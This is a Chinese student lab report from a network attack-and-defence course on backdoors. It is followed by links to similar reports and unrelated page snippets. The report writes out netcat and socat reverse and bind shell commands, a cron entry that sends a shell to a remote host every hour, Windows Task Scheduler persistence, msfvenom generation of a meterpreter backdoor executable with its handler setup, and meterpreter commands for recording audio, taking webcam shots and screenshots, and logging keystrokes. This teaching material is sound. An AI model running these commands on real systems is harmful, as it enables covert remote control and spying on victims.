2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
实验内容
1.使用netcat获取主机操作Shell,cron启动
2.使用socat获取主机操作Shell, 任务计划启动
3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
基础问题
- 例举你能想到的一个后门进入到你系统中的可能方式?
答:收到以银行或者学校名义给你发过来的虚假邮件,打开邮件并且下载邮件的附件之后,后门程序可能会进入你的计算机。 - 例举你知道的后门如何启动起来(win及linux)的方式?
答:通过修改注册表设置为开机自启动;进入挂马网站;下载一些有恶意程序绑定的软件。 - Meterpreter有哪些给你映像深刻的功能?
答:可以不用通过用户登录来访问计算机,并且随意进行开启摄像头,录制音频等操作。 如何发现自己有系统有没有被安装后门?
答:1.首先必须开启防火墙,而且防火墙对与某些危险操作的提示要仔细查看,不能疏忽。2.可以下载专业的杀毒软件(不要下载一些流氓软件如360),进行定期检查电脑。3.可以检测某些不常用的端口是否长时间开启,如果长时间开启说明电脑有一定的几率被植入了后门或者是病毒。实验过程
1.使用
netcat
获取主机操作Shell
,cron
启动
1.windows下获得一个linux shell
1.在Linux中使用ifconfig
查看Linux的ip地址
2.在Windows中使用ipconfig
查看本机ip地址
3.windows打开监听:ncat.exe -l -p 5235
,Linux反弹连接win:nc 192.168.1.101 5235 -e /bin/sh
,并且在Windows cmd下使用ls
命令查看是否成功。
2.Linux 下获得Windows的cmd程序
1.Linux运行监听指令:nc -l -p 5235
,Windows反弹连接Linux:ncat.exe -e cmd.exe 192.168.245.128 5235
,在Linux shell下使用dir
命令。
3.在Linux与Windows之间进行数据传送
1.Windows下监听端口:ncat.exe -l -p 5235
,,Linux下连接到Windows的端口:ncat 192.168.1.101 5235
,建立连接之后,就可以传输数据:
2.使用socat获取主机操作Shell, 任务计划启动
1.使用netcat获取主机操作Shell,cron启动
1.Windows中使用ncat.exe -l 5235
监听5235
端口
2.在linux中,使用crontab -e
指令编辑一条定时任务,选择编辑器时选择3
,在底行插入57 * * * * /bin/netcat 192.168.1.101 5235 -e /bin/sh
(每个小时的第57分钟反向连接Windows的5235端口)
3.:wq
保存退出配置即生效,可通过crontab -l
查看:
4.在系统时间到57分钟,就会在Windows中监听的cmd中发现获得了Linux shell
2.使用socat
获取主机操作Shell, 任务计划启动
1.win7系统中鼠标右击计算机:计算机管理->系统工具->任务计划程序->创建任务
2.常规中填写任务名称如:20165235
。
3.触发器-新建新建触发器,(按照图中步骤进行)
4.点击操作,将2操作所指的改为 启动程序
.
5.导入socat.exe
的路径,并添加参数:tcp-listen:5235 exec:cmd.exe,pty,stderr
(把cmd.exe绑定到端口5235,同时把cmd.exe的stderr重定向到stdout上)
6.创建完成之后,按Windows+L
快捷键锁定计算机,再次打开,运行之前创建的任务。
7.在Linux shell中输入socat - tcp:192.168.1.101:5235
:
3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1.在kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.245.128 LPORT=5235 -f exe > 20165235_backdoor.exe
,生成后门程序20165235_backdoor.exe
2.在Windows中使用ncat.exe -lv5235 > 20165235_backdoor.exe
3.Linux中输入nc 192.168.1.101 5235 < 20165235_backdoor.exe
。传输成功并且在Windows的ncat文件夹下查看后门程序。
4.再打开新的shell,并且使用msfconsole
进入msf
控制台:
5.输入use exploit/multi/handler
:
6.使用和生成后门程序时相同的payload:set payload windows/meterpreter/reverse_tcp
:
7.设置ip:set LHOST 192.168.245.128
9.设置端口:set LPORT 5235
10.使用exploit
开始监听
11.在Windows cmd 中相应文件夹中执行:20165235_backdoor.exe
,Linux获得Windows主机的连接,并且得到了远程控制的shell:
4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1.在以上的操作之上,使用record_mic
可以截获一段音频:
2.使用webcam_snap
可以使用摄像头拍照:
3.使用creenshot
可以进行截屏:
4.使用keyscan_start
记录下击键的过程,使用keyscan_dump
读取击键的记录:
实验中遇到的问题
1.错误一:在进行第一个实验时出现如下错误:
解决方法:在Linux
使用ifconfig
时出现很多地址,我很随意的填上去了一个,经过我仔细查看,将192.168.245.130
写入运行成功。
2.错误:在使用crontab -e
指令编辑一条定时任务时,发现win7端没有监听到Linux的shell
解决方法:因为在底部加入指令时没有将#
取除掉。
实验总结与体会
通过本次实验我首先明白了什么是后门。(后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法)。同时也学会了后门的基本原理,按照学长学姐以及同学的博客的指导下完成实验,学会了使用多种后门工具,同时也学会了如何防范别人对计算机的后门植入。在以后的学习生活中要注意网上安全,留意恶意程序。本此实验也有一定的趣味性,在完成后门植入后会有些许的成就感。
2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践的更多相关文章
- 2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践
2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务 ...
- 20155326刘美岑 《网络对抗》Exp2 后门原理与实践
20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155320《网络对抗》Exp2 后门原理与实践
20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 20155208徐子涵《网络对抗》Exp2 后门原理与实践
20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们 ...
- 20145236《网络对抗》Exp2 后门原理与实践
20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows ...
- 20155202 张旭《网络对抗》Exp2 后门原理与实践
20155202 张旭<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 ...
- 20155218《网络对抗》Exp2 后门原理与实践
20155218<网络对抗>Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用nc ...
- 20155227《网络对抗》Exp2 后门原理与实践
20155227<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站下载软件时,后门很可能被捆绑在软件中. 攻击者利用欺 ...
- 20155232《网络对抗》Exp2 后门原理与实践
20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(wi ...
随机推荐
- 【JS】前端文件下载(无刷新)方法总结
#传统方法 利用iframe 或 form.submit 或 windows.open直接向后端发请求,后端返回文件流,后端处理成功后会直接返回到页面,浏览器会整理并打开自己的保存下载文件机制 . 1 ...
- 环境判断:区别h5打开还是weixin打开?
var source_platform = '' , pf_source = 2; //系统平台 //区别是否是 微信浏览器 , source_platform 系统平台 2018.12.6新增 va ...
- ubuntu 安装 lamp
链接: http://www.cnblogs.com/CheeseZH/p/4694135.html
- window下 多开redis
1.先复制整个redis 一份 2.在配置文件redis.windows.conf .redis.windows-server.conf中 改端口 3.cmd命令 redis-server redi ...
- VS Code保存使用项目Eslint规则格式化代码
One.文件-首选项-设置-选择项目 Two.打开右上角JSON设置 Three. 插入以下代码 { "eslint.options& ...
- 【干货】使用SIFT取证工作站校验文件哈希----哈希一致则文件具备完整性
此实验来源于课程活动部分:第1单元:计算机取证基础 1.3活动和讨论 活动:* nix系统中文件的基本散列 注意:本博客更多的信息可能没有交代完善,有的人看不明白是因为,我知道,但是没有写出来.本 ...
- GX/GZOI2019 day2 解题报告
GX/GZOI2019 day2 解题报告 题目链接 逼死强迫症 旅行者 旧词 t1 逼死强迫症 显然地,记 \(f(i)\) 为长度为 \(i\) 的木板的答案,可得: \(\\\) \[f(i)= ...
- 修改Maven仓库路径
我自己新建的地址:D:\apache-maven-3.6.0\repository 找到:localRepository,修改为自定义的位置 在IDEA里面进行配置 这样项目的maven仓库地址就修改 ...
- electron Windows和mac 的菜单栏隐藏
1.Windows隐藏方法 const {electron,Menu,debug} = require('electron'); Menu.setApplicationMenu(null) 2.mac ...
- unity中调试模型时unity崩溃问题
这个问题是在我调试3D模型资源时出现的,每当在Scene场景中调试模型时unity崩溃,出现Unity Bug Reporter页面,反复出现这个问题,很烧脑 对于这个问题我表示很无语,但是经过不断查 ...